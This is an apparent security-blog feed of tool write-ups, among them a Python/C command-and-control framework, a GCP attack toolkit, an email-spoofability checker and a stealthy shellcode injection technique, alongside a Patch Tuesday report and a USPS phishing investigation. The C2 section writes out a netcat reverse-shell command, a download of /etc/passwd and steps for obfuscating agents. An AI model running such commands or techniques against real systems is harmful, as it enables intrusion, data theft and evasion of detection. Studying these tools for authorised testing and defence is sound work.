Double Venom (DVenom) is intended for educational and ethical testing purposes only. Using DVenom for attacking targets without prior mutual consent is illegal. The tool developer and contributor(s) are not responsible for any misuse of this tool.



TrafficWatch - TrafficWatch, A Packet Sniffer Tool, Allows You To Monitor And Analyze Network Traffic From PCAP Files

By: Zion3R


TrafficWatch, a packet sniffer tool, allows you to monitor and analyze network traffic from PCAP files. It provides insights into various network protocols and can help with network troubleshooting, security analysis, and more.

  • Protocol-specific packet analysis for ARP, ICMP, TCP, UDP, DNS, DHCP, HTTP, SNMP, LLMNR, and NetBIOS.
  • Packet filtering based on protocol, source IP, destination IP, source port, destination port, and more.
  • Summary statistics on captured packets.
  • Interactive mode for in-depth packet inspection.
  • Timestamps for each captured packet.
  • User-friendly colored output for improved readability.
  • Python 3.x
  • scapy
  • argparse
  • pyshark
  • colorama

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/TrafficWatch.git
  2. Navigate to the project directory:

    cd TrafficWatch
  3. Install the required dependencies:

    pip install -r requirements.txt

python3 trafficwatch.py --help
usage: trafficwatch.py [-h] -f FILE [-p {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}] [-c COUNT]

Packet Sniffer Tool

options:
-h, --help show this help message and exit
-f FILE, --file FILE Path to the .pcap file to analyze
-p {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}, --protocol {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}
Filter by specific protocol
-c COUNT, --count COUNT
Number of packets to display

To analyze packets from a PCAP file, use the following command:

python trafficwatch.py -f path/to/your.pcap

To specify a protocol filter (e.g., HTTP) and limit the number of displayed packets (e.g., 10), use:

python trafficwatch.py -f path/to/your.pcap -p HTTP -c 10

  • -f or --file: Path to the PCAP file for analysis.
  • -p or --protocol: Filter packets by protocol (ARP, ICMP, TCP, UDP, DNS, DHCP, HTTP, SNMP, LLMNR, NetBIOS).
  • -c or --count: Limit the number of displayed packets.

Contributions are welcome! If you want to contribute to TrafficWatch, please follow our contribution guidelines.

If you have any questions, comments, or suggestions about Dosinator, please feel free to contact me:

This project is licensed under the MIT License.

Thank you for considering supporting me! Your support enables me to dedicate more time and effort to creating useful tools like DNSWatch and developing new projects. By contributing, you're not only helping me improve existing tools but also inspiring new ideas and innovations. Your support plays a vital role in the growth of this project and future endeavors. Together, let's continue building and learning. Thank you!" 



GATOR - GCP Attack Toolkit For Offensive Research, A Tool Designed To Aid In Research And Exploiting Google Cloud Environments

By: Zion3R


GATOR - GCP Attack Toolkit for Offensive Research, a tool designed to aid in research and exploiting Google Cloud Environments. It offers a comprehensive range of modules tailored to support users in various attack stages, spanning from Reconnaissance to Impact.


Modules

Resource Category Primary Module Command Group Operation Description
User Authentication auth - activate Activate a Specific Authentication Method
- add Add a New Authentication Method
- delete Remove a Specific Authentication Method
- list List All Available Authentication Methods
Cloud Functions functions - list List All Deployed Cloud Functions
- permissions Display Permissions for a Specific Cloud Function
- triggers List All Triggers for a Specific Cloud Function
Cloud Storage storage buckets list List All Storage Buckets
permissions Display Permissions for Storage Buckets
Compute Engine compute instances add-ssh-key Add SSH Key to Compute Instances

Installation

Python 3.11 or newer should be installed. You can verify your Python version with the following command:

python --version

Manual Installation via setup.py

git clone https://github.com/anrbn/GATOR.git
cd GATOR
python setup.py install

Automated Installation via pip

pip install gator-red

Documentation

Have a look at the GATOR Documentation for an explained guide on using GATOR and it's module!

Issues

Reporting an Issue

If you encounter any problems with this tool, I encourage you to let me know. Here are the steps to report an issue:

  1. Check Existing Issues: Before reporting a new issue, please check the existing issues in this repository. Your issue might have already been reported and possibly even resolved.

  2. Create a New Issue: If your problem hasn't been reported, please create a new issue in the GitHub repository. Click the Issues tab and then click New Issue.

  3. Describe the Issue: When creating a new issue, please provide as much information as possible. Include a clear and descriptive title, explain the problem in detail, and provide steps to reproduce the issue if possible. Including the version of the tool you're using and your operating system can also be helpful.

  4. Submit the Issue: After you've filled out all the necessary information, click Submit new issue.

Your feedback is important, and will help improve the tool. I appreciate your contribution!

Resolving an Issue

I'll be reviewing reported issues on a regular basis and try to reproduce the issue based on your description and will communicate with you for further information if necessary. Once I understand the issue, I'll work on a fix.

Please note that resolving an issue may take some time depending on its complexity. I appreciate your patience and understanding.

Contributing

I warmly welcome and appreciate contributions from the community! If you're interested in contributing on any existing or new modules, feel free to submit a pull request (PR) with any new/existing modules or features you'd like to add.

Once you've submitted a PR, I'll review it as soon as I can. I might request some changes or improvements before merging your PR. Your contributions play a crucial role in making the tool better, and I'm excited to see what you'll bring to the project!

Thank you for considering contributing to the project.

Questions and Issues

If you have any questions regarding the tool or any of its modules, please check out the documentation first. I've tried to provide clear, comprehensive information related to all of its modules. If however your query is not yet solved or you have a different question altogether please don't hesitate to reach out to me via Twitter or LinkedIn. I'm always happy to help and provide support. :)



Who's Experimenting with AI Tools in Your Organization?

With the record-setting growth of consumer-focused AI productivity tools like ChatGPT, artificial intelligence—formerly the realm of data science and engineering teams—has become a resource available to every employee.  From a productivity perspective, that’s fantastic. Unfortunately for IT and security teams, it also means you may have hundreds of people in your organization using a new tool in

SecuSphere - Efficient DevSecOps

By: Zion3R


SecuSphere is a comprehensive DevSecOps platform designed to streamline and enhance your organization's security posture throughout the software development life cycle. Our platform serves as a centralized hub for vulnerability management, security assessments, CI/CD pipeline integration, and fostering DevSecOps practices and culture.


Centralized Vulnerability Management

At the heart of SecuSphere is a powerful vulnerability management system. Our platform collects, processes, and prioritizes vulnerabilities, integrating with a wide array of vulnerability scanners and security testing tools. Risk-based prioritization and automated assignment of vulnerabilities streamline the remediation process, ensuring that your teams tackle the most critical issues first. Additionally, our platform offers robust dashboards and reporting capabilities, allowing you to track and monitor vulnerability status in real-time.

Seamless CI/CD Pipeline Integration

SecuSphere integrates seamlessly with your existing CI/CD pipelines, providing real-time security feedback throughout your development process. Our platform enables automated triggering of security scans and assessments at various stages of your pipeline. Furthermore, SecuSphere enforces security gates to prevent vulnerable code from progressing to production, ensuring that security is built into your applications from the ground up. This continuous feedback loop empowers developers to identify and fix vulnerabilities early in the development cycle.

Comprehensive Security Assessment

SecuSphere offers a robust framework for consuming and analyzing security assessment reports from various CI/CD pipeline stages. Our platform automates the aggregation, normalization, and correlation of security findings, providing a holistic view of your application's security landscape. Intelligent deduplication and false-positive elimination reduce noise in the vulnerability data, ensuring that your teams focus on real threats. Furthermore, SecuSphere integrates with ticketing systems to facilitate the creation and management of remediation tasks.

Cultivating DevSecOps Practices

SecuSphere goes beyond tools and technology to help you drive and accelerate the adoption of DevSecOps principles and practices within your organization. Our platform provides security training and awareness for developers, security, and operations teams, helping to embed security within your development and operations processes. SecuSphere aids in establishing secure coding guidelines and best practices and fosters collaboration and communication between security, development, and operations teams. With SecuSphere, you'll create a culture of shared responsibility for security, enabling you to build more secure, reliable software.

Embrace the power of integrated DevSecOps with SecuSphere – secure your software development, from code to cloud.

 Features

  • Vulnerability Management: Collect, process, prioritize, and remediate vulnerabilities from a centralized platform, integrating with various vulnerability scanners and security testing tools.
  • CI/CD Pipeline Integration: Provide real-time security feedback with seamless CI/CD pipeline integration, including automated security scans, security gates, and a continuous feedback loop for developers.
  • Security Assessment: Analyze security assessment reports from various CI/CD pipeline stages with automated aggregation, normalization, correlation of security findings, and intelligent deduplication.
  • DevSecOps Practices: Drive and accelerate the adoption of DevSecOps principles and practices within your team. Benefit from our security training, secure coding guidelines, and collaboration tools.

Dashboard and Reporting

SecuSphere offers built-in dashboards and reporting capabilities that allow you to easily track and monitor the status of vulnerabilities. With our risk-based prioritization and automated assignment features, vulnerabilities are efficiently managed and sent to the relevant teams for remediation.

API and Web Console

SecuSphere provides a comprehensive REST API and Web Console. This allows for greater flexibility and control over your security operations, ensuring you can automate and integrate SecuSphere into your existing systems and workflows as seamlessly as possible.

For more information please refer to our Official Rest API Documentation

Integration with Ticketing Systems

SecuSphere integrates with popular ticketing systems, enabling the creation and management of remediation tasks directly within the platform. This helps streamline your security operations and ensure faster resolution of identified vulnerabilities.

Security Training and Awareness

SecuSphere is not just a tool, it's a comprehensive solution that drives and accelerates the adoption of DevSecOps principles and practices. We provide security training and awareness for developers, security, and operations teams, and aid in establishing secure coding guidelines and best practices.

User Guide

Get started with SecuSphere using our comprehensive user guide.

 Installation

You can install SecuSphere by cloning the repository, setting up locally, or using Docker.

Clone the Repository

$ git clone https://github.com/SecurityUniversalOrg/SecuSphere.git

Setup

Local Setup

Navigate to the source directory and run the Python file:

$ cd src/
$ python run.py

Dockerfile Setup

Build and run the Dockerfile in the cicd directory:

$ # From repository root
$ docker build -t secusphere:latest .
$ docker run secusphere:latest

Docker Compose

Use Docker Compose in the ci_cd/iac/ directory:

$ cd ci_cd/iac/
$ docker-compose -f secusphere.yml up

Pull from Docker Hub

Pull the latest version of SecuSphere from Docker Hub and run it:

$ docker pull securityuniversal/secusphere:latest
$ docker run -p 8081:80 -d secusphere:latest

Feedback and Support

We value your feedback and are committed to providing the best possible experience with SecuSphere. If you encounter any issues or have suggestions for improvement, please create an issue in this repository or contact our support team.

Contributing

We welcome contributions to SecuSphere. If you're interested in improving SecuSphere or adding new features, please read our contributing guide.



Commander - A Command And Control (C2) Server

By: Zion3R


Commander is a command and control framework (C2) written in Python, Flask and SQLite. It comes with two agents written in Python and C.

Under Continuous Development

Not script-kiddie friendly


Features

  • Fully encrypted communication (TLS)
  • Multiple Agents
  • Obfuscation
  • Interactive Sessions
  • Scalable
  • Base64 data encoding
  • RESTful API

Agents

  • Python 3
    • The python agent supports:
      • sessions, an interactive shell between the admin and the agent (like ssh)
      • obfuscation
      • Both Windows and Linux systems
      • download/upload files functionality
  • C
    • The C agent supports only the basic functionality for now, the control of tasks for the agents
    • Only for Linux systems

Requirements

Python >= 3.6 is required to run and the following dependencies

Linux for the admin.py and c2_server.py. (Untested for windows)
apt install libcurl4-openssl-dev libb64-dev
apt install openssl
pip3 install -r requirements.txt

How to Use it

First create the required certs and keys

# if you want to secure your key with a passphrase exclude the -nodes
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt -days 365 -nodes

Start the admin.py module first in order to create a local sqlite db file

python3 admin.py

Continue by running the server

python3 c2_server.py

And last the agent. For the python case agent you can just run it but in the case of the C agent you need to compile it first.

# python agent
python3 agent.py

# C agent
gcc agent.c -o agent -lcurl -lb64
./agent

By default both the Agents and the server are running over TLS and base64. The communication point is set to 127.0.0.1:5000 and in case a different point is needed it should be changed in Agents source files.

As the Operator/Administrator you can use the following commands to control your agents

Commands:

task add arg c2-commands
Add a task to an agent, to a group or on all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
c2-commands: possible values are c2-register c2-shell c2-sleep c2-quit
c2-register: Triggers the agent to register again.
c2-shell cmd: It takes an shell command for the agent to execute. eg. c2-shell whoami
cmd: The command to execute.
c2-sleep: Configure the interval that an agent will check for tasks.
c2-session port: Instructs the agent to open a shell session with the server to this port.
port: The port to connect to. If it is not provided it defaults to 5555.
c2-quit: Forces an agent to quit.

task delete arg
Delete a task from an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show agent arg
Displays inf o for all the availiable agents or for specific agent.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show task arg
Displays the task of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show result arg
Displays the history/result of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
find active agents
Drops the database so that the active agents will be registered again.

exit
Bye Bye!


Sessions:

sessions server arg [port]
Controls a session handler.
arg: can have the following values: 'start' , 'stop' 'status'
port: port is optional for the start arg and if it is not provided it defaults to 5555. This argument defines the port of the sessions server
sessions select arg
Select in which session to attach.
arg: the index from the 'sessions list' result
sessions close arg
Close a session.
arg: the index from the 'sessions list' result
sessions list
Displays the availiable sessions
local-ls directory
Lists on your host the files on the selected directory
download 'file'
Downloads the 'file' locally on the current directory
upload 'file'
Uploads a file in the directory where the agent currently is

Special attention should be given to the 'find active agents' command. This command deletes all the tables and creates them again. It might sound scary but it is not, at least that is what i believe :P

The idea behind this functionality is that the c2 server can request from an agent to re-register at the case that it doesn't recognize him. So, since we want to clear the db from unused old entries and at the same time find all the currently active hosts we can drop the tables and trigger the re-register mechanism of the c2 server. See below for the re-registration mechanism.

Flows

Below you can find a normal flow diagram

Normal Flow

In case where the environment experiences a major failure like a corrupted database or some other critical failure the re-registration mechanism is enabled so we don't lose our connection with our agents.

More specifically, in case where we lose the database we will not have any information about the uuids that we are receiving thus we can't set tasks on them etc... So, the agents will keep trying to retrieve their tasks and since we don't recognize them we will ask them to register again so we can insert them in our database and we can control them again.

Below is the flow diagram for this case.

Re-register Flow

Useful examples

To setup your environment start the admin.py first and then the c2_server.py and run the agent. After you can check the availiable agents.

# show all availiable agents
show agent all

To instruct all the agents to run the command "id" you can do it like this:

To check the history/ previous results of executed tasks for a specific agent do it like this:
# check the results of a specific agent
show result 85913eb1245d40eb96cf53eaf0b1e241

You can also change the interval of the agents that checks for tasks to 30 seconds like this:

# to set it for all agents
task add all c2-sleep 30

To open a session with one or more of your agents do the following.

# find the agent/uuid
show agent all

# enable the server to accept connections
sessions server start 5555

# add a task for a session to your prefered agent
task add your_prefered_agent_uuid_here c2-session 5555

# display a list of available connections
sessions list

# select to attach to one of the sessions, lets select 0
sessions select 0

# run a command
id

# download the passwd file locally
download /etc/passwd

# list your files locally to check that passwd was created
local-ls

# upload a file (test.txt) in the directory where the agent is
upload test.txt

# return to the main cli
go back

# check if the server is running
sessions server status

# stop the sessions server
sessions server stop

If for some reason you want to run another external session like with netcat or metaspolit do the following.

# show all availiable agents
show agent all

# first open a netcat on your machine
nc -vnlp 4444

# add a task to open a reverse shell for a specific agent
task add 85913eb1245d40eb96cf53eaf0b1e241 c2-shell nc -e /bin/sh 192.168.1.3 4444

This way you will have a 'die hard' shell that even if you get disconnected it will get back up immediately. Only the interactive commands will make it die permanently.

Obfuscation

The python Agent offers obfuscation using a basic AES ECB encryption and base64 encoding

Edit the obfuscator.py file and change the 'key' value to a 16 char length key in order to create a custom payload. The output of the new agent can be found in Agents/obs_agent.py

You can run it like this:

python3 obfuscator.py

# and to run the agent, do as usual
python3 obs_agent.py

Tips &Tricks

  1. The build-in flask app server can't handle multiple/concurrent requests. So, you can use the gunicorn server for better performance like this:
gunicorn -w 4 "c2_server:create_app()" --access-logfile=- -b 0.0.0.0:5000 --certfile server.crt --keyfile server.key 
  1. Create a binary file for your python agent like this
pip install pyinstaller
pyinstaller --onefile agent.py

The binary can be found under the dist directory.

In case something fails you may need to update your python and pip libs. If it continues failing then ..well.. life happened

  1. Create new certs in each engagement

  2. Backup your c2.db, it is easy... just a file

Testing

pytest was used for the testing. You can run the tests like this:

cd tests/
py.test

Be careful: You must run the tests inside the tests directory otherwise your c2.db will be overwritten and you will lose your data

To check the code coverage and produce a nice html report you can use this:

# pip3 install pytest-cov
python -m pytest --cov=Commander --cov-report html

Disclaimer: This tool is only intended to be a proof of concept demonstration tool for authorized security testing. Running this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.



JSpector - A Simple Burp Suite Extension To Crawl JavaScript (JS) Files In Passive Mode And Display The Results Directly On The Issues

By: Zion3R


JSpector is a Burp Suite extension that passively crawls JavaScript files and automatically creates issues with URLs, endpoints and dangerous methods found on the JS files.


Prerequisites

Before installing JSpector, you need to have Jython installed on Burp Suite.

Installation

  1. Download the latest version of JSpector
  2. Open Burp Suite and navigate to the Extensions tab.
  3. Click the Add button in the Installed tab.
  4. In the Extension Details dialog box, select Python as the Extension Type.
  5. Click the Select file button and navigate to the JSpector.py.
  6. Click the Next button.
  7. Once the output shows: "JSpector extension loaded successfully", click the Close button.

Usage

  • Just navigate through your targets and JSpector will start passively crawl JS files in the background and automatically returns the results on the Dashboard tab.
  • You can export all the results to the clipboard (URLs, endpoints and dangerous methods) with a right click directly on the JS file:



Spoofy - Program That Checks If A List Of Domains Can Be Spoofed Based On SPF And DMARC Records

By: Zion3R



Spoofy is a program that checks if a list of domains can be spoofed based on SPF and DMARC records. You may be asking, "Why do we need another tool that can check if a domain can be spoofed?"

Well, Spoofy is different and here is why:

  1. Authoritative lookups on all lookups with known fallback (Cloudflare DNS)
  2. Accurate bulk lookups
  3. Custom, manually tested spoof logic (No guessing or speculating, real world test results)
  4. SPF lookup counter

 

HOW TO USE

Spoofy requires Python 3+. Python 2 is not supported. Usage is shown below:

Usage:
./spoofy.py -d [DOMAIN] -o [stdout or xls]
OR
./spoofy.py -iL [DOMAIN_LIST] -o [stdout or xls]

Install Dependencies:
pip3 install -r requirements.txt

HOW DO YOU KNOW ITS SPOOFABLE

(The spoofability table lists every combination of SPF and DMARC configurations that impact deliverability to the inbox, except for DKIM modifiers.) Download Here

METHODOLOGY

The creation of the spoofability table involved listing every relevant SPF and DMARC configuration, combining them, and then conducting SPF and DMARC information collection using an early version of Spoofy on a large number of US government domains. Testing if an SPF and DMARC combination was spoofable or not was done using the email security pentesting suite at emailspooftest using Microsoft 365. However, the initial testing was conducted using Protonmail and Gmail, but these services were found to utilize reverse lookup checks that affected the results, particularly for subdomain spoof testing. As a result, Microsoft 365 was used for the testing, as it offered greater control over the handling of mail.

After the initial testing using Microsoft 365, some combinations were retested using Protonmail and Gmail due to the differences in their handling of banners in emails. Protonmail and Gmail can place spoofed mail in the inbox with a banner or in spam without a banner, leading to some SPF and DMARC combinations being reported as "Mailbox Dependent" when using Spoofy. In contrast, Microsoft 365 places both conditions in spam. The testing and data collection process took several days to complete, after which a good master table was compiled and used as the basis for the Spoofy spoofability logic.

DISCLAIMER

This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this tool and software.

CREDIT

Lead / Only programmer & spoofability logic comprehension upgrades & lookup resiliency system / fix (main issue with other tools) & multithreading & feature additions: Matt Keeley

DMARC, SPF, DNS insights & Spoofability table creation/confirmation/testing & application accuracy/quality assurance: calamity.email / eman-ekaf

Logo: cobracode

Tool was inspired by Bishop Fox's project called spoofcheck.



Patch Tuesday, October 2023 Edition

Microsoft today issued security updates for more than 100 newly-discovered vulnerabilities in its Windows operating system and related software, including four flaws that are already being exploited. In addition, Apple recently released emergency updates to quash a pair of zero-day bugs in iOS.

Apple last week shipped emergency updates in iOS 17.0.3 and iPadOS 17.0.3 in response to active attacks. The patch fixes CVE-2023-42724, which attackers have been using in targeted attacks to elevate their access on a local device.

Apple said it also patched CVE-2023-5217, which is not listed as a zero-day bug. However, as Bleeping Computer pointed out, this flaw is caused by a weakness in the open-source “libvpx” video codec library, which was previously patched as a zero-day flaw by Google in the Chrome browser and by Microsoft in Edge, Teams, and Skype products. For anyone keeping count, this is the 17th zero-day flaw that Apple has patched so far this year.

Fortunately, the zero-days affecting Microsoft customers this month are somewhat less severe than usual, with the exception of CVE-2023-44487. This weakness is not specific to Windows but instead exists within the HTTP/2 protocol used by the World Wide Web: Attackers have figured out how to use a feature of HTTP/2 to massively increase the size of distributed denial-of-service (DDoS) attacks, and these monster attacks reportedly have been going on for several weeks now.

Amazon, Cloudflare and Google all released advisories today about how they’re addressing CVE-2023-44487 in their cloud environments. Google’s Damian Menscher wrote on Twitter/X that the exploit — dubbed a “rapid reset attack” — works by sending a request and then immediately cancelling it (a feature of HTTP/2). “This lets attackers skip waiting for responses, resulting in a more efficient attack,” Menscher explained.

Natalie Silva, lead security engineer at Immersive Labs, said this flaw’s impact to enterprise customers could be significant, and lead to prolonged downtime.

“It is crucial for organizations to apply the latest patches and updates from their web server vendors to mitigate this vulnerability and protect against such attacks,” Silva said. In this month’s Patch Tuesday release by Microsoft, they have released both an update to this vulnerability, as well as a temporary workaround should you not be able to patch immediately.”

Microsoft also patched zero-day bugs in Skype for Business (CVE-2023-41763) and Wordpad (CVE-2023-36563). The latter vulnerability could expose NTLM hashes, which are used for authentication in Windows environments.

“It may or may not be a coincidence that Microsoft announced last month that WordPad is no longer being updated, and will be removed in a future version of Windows, although no specific timeline has yet been given,” said Adam Barnett, lead software engineer at Rapid7. “Unsurprisingly, Microsoft recommends Word as a replacement for WordPad.”

Other notable bugs addressed by Microsoft include CVE-2023-35349, a remote code execution weakness in the Message Queuing (MSMQ) service, a technology that allows applications across multiple servers or hosts to communicate with each other. This vulnerability has earned a CVSS severity score of 9.8 (10 is the worst possible). Happily, the MSMQ service is not enabled by default in Windows, although Immersive Labs notes that Microsoft Exchange Server can enable this service during installation.

Speaking of Exchange, Microsoft also patched CVE-2023-36778,  a vulnerability in all current versions of Exchange Server that could allow attackers to run code of their choosing. Rapid7’s Barnett said successful exploitation requires that the attacker be on the same network as the Exchange Server host, and use valid credentials for an Exchange user in a PowerShell session.

For a more detailed breakdown on the updates released today, see the SANS Internet Storm Center roundup. If today’s updates cause any stability or usability issues in Windows, AskWoody.com will likely have the lowdown on that.

Please consider backing up your data and/or imaging your system before applying any updates. And feel free to sound off in the comments if you experience any difficulties as a result of these patches.

Phishers Spoof USPS, 12 Other Natl’ Postal Services

The fake USPS phishing page.

Recent weeks have seen a sizable uptick in the number of phishing scams targeting U.S. Postal Service (USPS) customers. Here’s a look at an extensive SMS phishing operation that tries to steal personal and financial data by spoofing the USPS, as well as postal services in at least a dozen other countries.

KrebsOnSecurity recently heard from a reader who received an SMS purporting to have been sent by the USPS, saying there was a problem with a package destined for the reader’s address. Clicking the link in the text message brings one to the domain usps.informedtrck[.]com.

The landing page generated by the phishing link includes the USPS logo, and says “Your package is on hold for an invalid recipient address. Fill in the correct address info by the link.” Below that message is a “Click update” button that takes the visitor to a page that asks for more information.

The remaining buttons on the phishing page all link to the real USPS.com website. After collecting your address information, the fake USPS site goes on to request additional personal and financial data.

This phishing domain was recently registered and its WHOIS ownership records are basically nonexistent. However, we can find some compelling clues about the extent of this operation by loading the phishing page in Developer Tools, a set of debugging features built into Firefox, Chrome and Safari that allow one to closely inspect a webpage’s code and operations.

Check out the bottom portion of the screenshot below, and you’ll notice that this phishing site fails to load some external resources, including an image from a link called fly.linkcdn[.]to.

Click the image to enlarge.

A search on this domain at the always-useful URLscan.io shows that fly.linkcdn[.]to is tied to a slew of USPS-themed phishing domains. Here are just a few of those domains (links defanged to prevent accidental clicking):

usps.receivepost[.]com
usps.informedtrck[.]com
usps.trckspost[.]com
postreceive[.]com
usps.trckpackages[.]com
usps.infortrck[.]com
usps.quicktpos[.]com
usps.postreceive].]com
usps.revepost[.]com
trackingusps.infortrck[.]com
usps.receivepost[.]com
usps.trckmybusi[.]com
postreceive[.]com
tackingpos[.]com
usps.trckstamp[.]com
usa-usps[.]shop
usps.infortrck[.]com
unlistedstampreceive[.]com
usps.stampreceive[.]com
usps.stamppos[.]com
usps.stampspos[.]com
usps.trckmypost[.]com
usps.trckintern[.]com
usps.tackingpos[.]com
usps.posinformed[.]com

As we can see in the screenshot below, the developer tools console for informedtrck[.]com complains that the site is unable to load a Google Analytics code — UA-80133954-3 — which apparently was rejected for pointing to an invalid domain.

Notice the highlighted Google Analytics code exposed by a faulty Javascript element on the phishing website. Click to enlarge. That code actually belongs to the USPS.

The valid domain for that Google Analytics code is the official usps.com website. According to dnslytics.com, that same analytics code has shown up on at least six other nearly identical USPS phishing pages dating back nearly as many years, including onlineuspsexpress[.]com, which DomainTools.com says was registered way back in September 2018 to an individual in Nigeria.

A different domain with that same Google Analytics code that was registered in 2021 is peraltansepeda[.]com, which archive.org shows was running a similar set of phishing pages targeting USPS users. DomainTools.com indicates this website name was registered by phishers based in Indonesia.

DomainTools says the above-mentioned USPS phishing domain stamppos[.]com was registered in 2022 via Singapore-based Alibaba.com, but the registrant city and state listed for that domain says “Georgia, AL,” which is not a real location.

Alas, running a search for domains registered through Alibaba to anyone claiming to reside in Georgia, AL reveals nearly 300 recent postal phishing domains ending in “.top.” These domains are either administrative domains obscured by a password-protected login page, or are .top domains phishing customers of the USPS as well as postal services serving other countries.

Those other nations include the Australia Post, An Post (Ireland), Correos.es (Spain), the Costa Rican post, the Chilean Post, the Mexican Postal Service, Poste Italiane (Italy), PostNL (Netherlands), PostNord (Denmark, Norway and Sweden), and Posti (Finland). A complete list of these domains is available here (PDF).

A phishing page targeting An Post, the state-owned provider of postal services in Ireland.

The Georgia, AL domains at Alibaba also encompass several that spoof sites claiming to collect outstanding road toll fees and fines on behalf of the governments of Australia, New Zealand and Singapore.

An anonymous reader wrote in to say they submitted fake information to the above-mentioned phishing site usps.receivepost[.]com via the malware sandbox any.run. A video recording of that analysis shows that the site sends any submitted data via an automated bot on the Telegram instant messaging service.

The traffic analysis just below the any.run video shows that any data collected by the phishing site is being sent to the Telegram user @chenlun, who offers to sell customized source code for phishing pages. From a review of @chenlun’s other Telegram channels, it appears this account is being massively spammed at the moment — possibly thanks to public attention brought by this story.

Meanwhile, researchers at DomainTools recently published a report on an apparently unrelated but equally sprawling SMS-based phishing campaign targeting USPS customers that appears to be the work of cybercriminals based in Iran.

Phishers tend to cast a wide net and often spoof entities that are broadly used by the local population, and few brands are going to have more household reach than domestic mail services. In June, the United Parcel Service (UPS) disclosed that fraudsters were abusing an online shipment tracking tool in Canada to send highly targeted SMS phishing messages that spoofed the UPS and other brands.

With the holiday shopping season nearly upon us, now is a great time to remind family and friends about the best advice to sidestep phishing scams: Avoid clicking on links or attachments that arrive unbidden in emails, text messages and other mediums. Most phishing scams invoke a temporal element that warns of negative consequences should you fail to respond or act quickly.

If you’re unsure whether the message is legitimate, take a deep breath and visit the site or service in question manually — ideally, using a browser bookmark so as to avoid potential typosquatting sites.

Update: Added information about the Telegram bot and any.run analysis.

Dissect - Digital Forensics, Incident Response Framework And Toolset That Allows You To Quickly Access And Analyse Forensic Artefacts From Various Disk And File Formats

By: Zion3R

Dissect is a digital forensics & incident response framework and toolset that allows you to quickly access and analyse forensic artefacts from various disk and file formats, developed by Fox-IT (part of NCC Group).

This project is a meta package, it will install all other Dissect modules with the right combination of versions. For more information, please see the documentation.


What is Dissect?

Dissect is an incident response framework build from various parsers and implementations of file formats. Tying this all together, Dissect allows you to work with tools named target-query and target-shell to quickly gain access to forensic artefacts, such as Runkeys, Prefetch files, and Windows Event Logs, just to name a few!

Singular approach

And the best thing: all in a singular way, regardless of underlying container (E01, VMDK, QCoW), filesystem (NTFS, ExtFS, FFS), or Operating System (Windows, Linux, ESXi) structure / combination. You no longer have to bother extracting files from your forensic container, mount them (in case of VMDKs and such), retrieve the MFT, and parse it using a separate tool, to finally create a timeline to analyse. This is all handled under the hood by Dissect in a user-friendly manner.

If we take the example above, you can start analysing parsed MFT entries by just using a command like target-query -f mft <PATH_TO_YOUR_IMAGE>!

Create a lightweight container using Acquire

Dissect also provides you with a tool called acquire. You can deploy this tool on endpoint(s) to create a lightweight container of these machine(s). What is convenient as well, is that you can deploy acquire on a hypervisor to quickly create lightweight containers of all the (running) virtual machines on there! All without having to worry about file-locks. These lightweight containers can then be analysed using the tools like target-query and target-shell, but feel free to use other tools as well.

A modular setup

Dissect is made with a modular approach in mind. This means that each individual project can be used on its own (or in combination) to create a completely new tool for your engagement or future use!

Try it out now!

Interested in trying it out for yourself? You can simply pip install dissect and start using the target-* tooling right away. Or you can use the interactive playground at https://try.dissect.tools to try Dissect in your browser.

Don’t know where to start? Check out the introduction page.

Want to get a detailed overview? Check out the overview page.

Want to read everything? Check out the documentation.

Projects

Dissect currently consists of the following projects.

Related

These projects are closely related to Dissect, but not installed by this meta package.

Requirements

This project is part of the Dissect framework and requires Python.

Information on the supported Python versions can be found in the Getting Started section of the documentation.

Installation

dissect is available on PyPI.

pip install dissect

Build and test instructions

This project uses tox to build source and wheel distributions. Run the following command from the root folder to build these:

tox -e build

The build artifacts can be found in the dist/ directory.

tox is also used to run linting and unit tests in a self-contained environment. To run both linting and unit tests using the default installed Python version, run:

tox

For a more elaborate explanation on how to build and test the project, please see the documentation.



ModuleShifting - Stealthier Variation Of Module Stomping And Module Overloading Injection Techniques That Reduces Memory IoCs

By: Zion3R


ModuleShifting is stealthier variation of Module Stomping and Module overloading injection technique. It is actually implemented in Python ctypes so that it can be executed fully in memory via a Python interpreter and Pyramid, thus avoiding the usage of compiled loaders.

The technique can be used with PE or shellcode payloads, however, the stealthier variation is to be used with shellcode payloads that need to be functionally independent from the final payload that the shellcode is loading.


ModuleShifting, when used with shellcode payload, is performing the following operations:

  1. Legitimate hosting dll is loaded via LoadLibrary
  2. Change the memory permissions of a specified section to RW
  3. Overwrite shellcode over the target section
  4. add optional padding to better blend into false positive behaviour (more information here)
  5. Change permissions to RX
  6. Execute shellcode via function pointer - additional execution methods: function callback or CreateThread API
  7. Write original dll content over the executed shellcode - this step avoids leaving a malicious memory artifact on the image memory space of the hosting dll. The shellcode needs to be functionally independent from further stages otherwise execution will break.

When using a PE payload, ModuleShifting will perform the following operation:

  1. Legitimate hosting dll is loaded via LoadLibrary
  2. Change the memory permissions of a specified section to RW
  3. copy the PE over the specified target point section-by-section
  4. add optional padding to better blend into false positive behaviour
  5. perform base relocation
  6. resolve imports
  7. finalize section by setting permissions to their native values (avoids the creation of RWX memory region)
  8. TLS callbacks execution
  9. Executing PE entrypoint

Why it's useful

ModuleShifting can be used to inject a payload without dynamically allocating memory (i.e. VirtualAlloc) and compared to Module Stomping and Module Overloading is stealthier because it decreases the amount of IoCs generated by the injection technique itself.

There are 3 main differences between Module Shifting and some public implementations of Module stomping (one from Bobby Cooke and WithSecure)

  1. Padding: when writing shellcode or PE, you can use padding to better blend into common False Positive behaviour (such as third-party applications or .net dlls writing x amount of bytes over their .text section).
